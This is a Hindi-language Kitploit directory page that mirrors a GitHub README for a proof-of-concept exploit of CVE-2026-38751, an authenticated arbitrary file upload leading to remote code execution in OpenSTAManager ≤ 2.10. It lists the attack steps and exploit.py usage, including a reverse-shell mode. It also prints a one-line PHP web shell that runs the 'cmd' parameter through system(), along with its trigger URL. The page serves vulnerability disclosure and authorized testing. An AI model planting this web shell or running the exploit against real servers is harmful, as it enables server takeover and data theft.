Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-38751-OpenSTAManager-Arbitrary-File-Upload-PoC — इस रिपॉजिटरी में CVE-2026-38751 के लिए एक प्रमाण-अवधारणा (PoC) शोषण शामिल है, जो OpenSTAManager ≤ 2.10 को प्रभावित करता है। यह भेद्यता एक प्रमाणित हमलावर को मॉड्यूल अपडेट कार्यक्षमता के माध्यम से एक दुर्भावनापूर्ण मॉड्यूल अपलोड करने की अनुमति देती है, जिससे मनमाना फ़ाइल अपलोड और रिमोट कोड निष्पादन (RCE) होता है। | Kitploit
उपकरण/GitHubGitHub/mkps/cve-2026-38751-openstamanager-arbitrary-file-upload-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubmkps/cve-2026-38751-openstamanager-arbitrary-file-upload-poc

CVE-2026-38751-OpenSTAManager-Arbitrary-File-Upload-PoC

रिपॉजिटरी देखें
12 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

इस रिपॉजिटरी में CVE-2026-38751 के लिए एक प्रमाण-अवधारणा (PoC) शोषण शामिल है, जो OpenSTAManager ≤ 2.10 को प्रभावित करता है। यह भेद्यता एक प्रमाणित हमलावर को मॉड्यूल अपडेट कार्यक्षमता के माध्यम से एक दुर्भावनापूर्ण मॉड्यूल अपलोड करने की अनुमति देती है, जिससे मनमाना फ़ाइल अपलोड और रिमोट कोड निष्पादन (RCE) होता है।

साझा करें

CVE-2026-38751 – OpenSTAManager मनमाना फ़ाइल अपलोड (PoC)

इस रिपॉज़िटरी में CVE-2026-38751 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट शामिल है, जो OpenSTAManager ≤ 2.10 को प्रभावित करता है। यह कमज़ोरी एक प्रमाणित हमलावर को मॉड्यूल अपडेट कार्यक्षमता के माध्यम से एक दुर्भावनापूर्ण मॉड्यूल अपलोड करने की अनुमति देती है, जिससे मनमाना फ़ाइल अपलोड और रिमोट कोड निष्पादन (RCE) होता है।

CVE संदर्भ

  • MITRE CVE प्रविष्टि (प्रथम प्रकटीकरण रिकॉर्ड): https://www.cve.org/CVERecord?id=CVE-2026-38751
  • NVD (NIST) कमज़ोरी डेटाबेस: https://nvd.nist.gov/vuln/detail/CVE-2026-38751
  • GitHub Advisory Database https://github.com/advisories/GHSA-rm34-fg4m-39mw

प्रभावित सॉफ़्टवेयर

  • OpenSTAManager ≤ 2.10
  • मॉड्यूल अपडेट प्रणाली (modules/aggiornamenti/upload_modules.php)

कमज़ोरी विवरण

मॉड्यूल अपडेट कार्यक्षमता प्रमाणित उपयोगकर्ताओं को फ़ाइल सामग्री या निष्पादन सीमाओं के उचित सत्यापन के बिना ZIP-आधारित मॉड्यूल अपलोड करने की अनुमति देती है। एक हमलावर PHP पेलोड युक्त एक दुर्भावनापूर्ण मॉड्यूल तैयार कर सकता है, जिसे फिर वेब रूट में तैनात किया जाता है और एप्लिकेशन संदर्भ के माध्यम से निष्पादित किया जाता है। इसके परिणामस्वरूप:

  • मनमाना फ़ाइल अपलोड (CWE-434)
  • अपलोड की गई PHP फ़ाइलों के माध्यम से रिमोट कोड निष्पादन
  • एप्लिकेशन संदर्भ का पूर्ण समझौता

हमला प्रवाह (उच्च-स्तरीय)

  1. OpenSTAManager में प्रमाणित करें
  2. तैयार किया गया मॉड्यूल ZIP संग्रह अपलोड करें
  3. मॉड्यूल इंस्टॉलेशन/अपडेट प्रक्रिया ट्रिगर करें
  4. वेब रूट के माध्यम से अपलोड किए गए PHP पेलोड तक पहुँचें
  5. सर्वर पर मनमाने कमांड निष्पादित करें

##प्रभाव सफल शोषण अनुमति देता है:

  • रिमोट कमांड निष्पादन
  • वेब सर्वर समझौता
  • डेटा एक्सफ़िल्ट्रेशन
  • विशेषाधिकारों के आधार पर पूर्ण एप्लिकेशन अधिग्रहण

आवश्यकताएँ

  • मान्य प्रमाणित उपयोगकर्ता खाता
  • मॉड्यूल अपडेट कार्यक्षमता तक पहुँच सक्षम

उपयोग (PoC)

  1. दुर्भावनापूर्ण मॉड्यूल उत्पन्न करें
root@kitploit:~
python exploit.py --build

बनाता है:

root@kitploit:~
update.zip
└── run/
    ├── MODULE
    └── evil.php
  1. एक्सप्लॉइट चलाएँ
root@kitploit:~
python exploit.py <username> <password> <target_url>

वैकल्पिक रिवर्स शेल मोड:

root@kitploit:~
python exploit.py <username> <password> <target_url> --lhost <IP> --lport <PORT>

उदाहरण पेलोड

root@kitploit:~
<?php
isset($_GET['cmd']) && system($_GET['cmd']);
?>

सत्यापन

सफल होने पर, निम्नलिखित एंडपॉइंट सिस्टम कमांड निष्पादित करता है: /modules/run/evil.php?cmd=id

MITRE / NVD संदर्भ

  • MITRE CVE रिकॉर्ड: https://www.cve.org/CVERecord?id=CVE-2026-38751
  • NVD प्रविष्टि: https://nvd.nist.gov/vuln/detail/CVE-2026-38751

अस्वीकरण

यह प्रोजेक्ट निम्नलिखित उद्देश्यों के लिए है:

  • शैक्षिक उद्देश्य
  • अधिकृत सुरक्षा परीक्षण
  • अनुसंधान वातावरण

स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध उपयोग न करें।

नोट्स

सर्वर कॉन्फ़िगरेशन के आधार पर पता लगाना भिन्न हो सकता है। कुछ डिप्लॉयमेंट मॉड्यूल निर्देशिकाओं में प्रत्यक्ष PHP निष्पादन अक्षम कर सकते हैं। मॉड्यूल सक्रियण के समय में पुनः प्रयास की आवश्यकता हो सकती है।

आभार

  • MITRE CVE कार्यक्रम
  • NIST राष्ट्रीय कमज़ोरी डेटाबेस (NVD)
  • OpenSTAManager प्रोजेक्ट अनुरक्षक
  • https://github.com/fuutianyii/poc (प्रथम PoC)
टूल डाउनलोड करें